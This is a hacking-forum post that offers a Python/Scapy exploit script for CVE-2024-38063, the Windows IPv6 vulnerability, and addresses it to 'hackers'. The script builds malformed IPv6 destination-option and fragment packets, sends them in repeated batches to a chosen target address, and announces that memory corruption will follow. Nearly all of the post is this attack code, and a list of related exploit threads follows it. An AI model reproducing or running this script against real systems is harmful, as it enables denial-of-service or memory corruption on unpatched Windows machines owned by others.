CVE-2024-38063 [Windows IPv6] EXPLOIT
by samonegod - Tuesday January 28, 2025 at 04:27 PM
#1
Warm regards hackers, many people were struggling with finding original exploit for windows IPv6 vulnerability CVE-2024-38063.
You can read something about it right here - https://cve.mitre.org/cgi-bin/cvename.cg...2024-38063
Here's the code:

from scapy.all import *
iface=''
ip_addr=''
mac_addr=''
num_tries=20
num_batches=20
def get_packets_with_mac(i):
    frag_id = 0xdebac1e + i
    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
    return [first, second, third]
def get_packets(i):
    if mac_addr != '':
        return get_packets_with_mac(i)
    frag_id = 0xdebac1e + i
    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
    return [first, second, third]
final_ps = []
for _ in range(num_batches):
    for i in range(num_tries):
        final_ps += get_packets(i) + get_packets(i)
print("Sending packets")
if mac_addr != '':
    sendp(final_ps, iface)
else:
    send(final_ps, iface)
for i in range(60):
    print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
    time.sleep(1)
print("")
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Exploit Hikvision Camera cctv A3g00n 160 4,488 7 hours ago
Last Post: v3nuzc0d3r2325
  Exploit Safety-net PoC Inexorable_Baer 2 237 08-02-2025, 08:53 AM
Last Post: Inexorable_Baer
  Telerik Exploit report server A3g00n 1 406 04-11-2025, 04:16 AM
Last Post: dghdj
  CVE-2024-21006 - Oracle WebLogic Server - HIGH tkqz 2 616 04-09-2025, 11:05 PM
Last Post: 9anatnaja7
  CVE-2024-43363 Poc result 29 2,182 04-09-2025, 12:53 AM
Last Post: slabadaba

Forum Jump:


 Users browsing this thread: 1 Guest(s)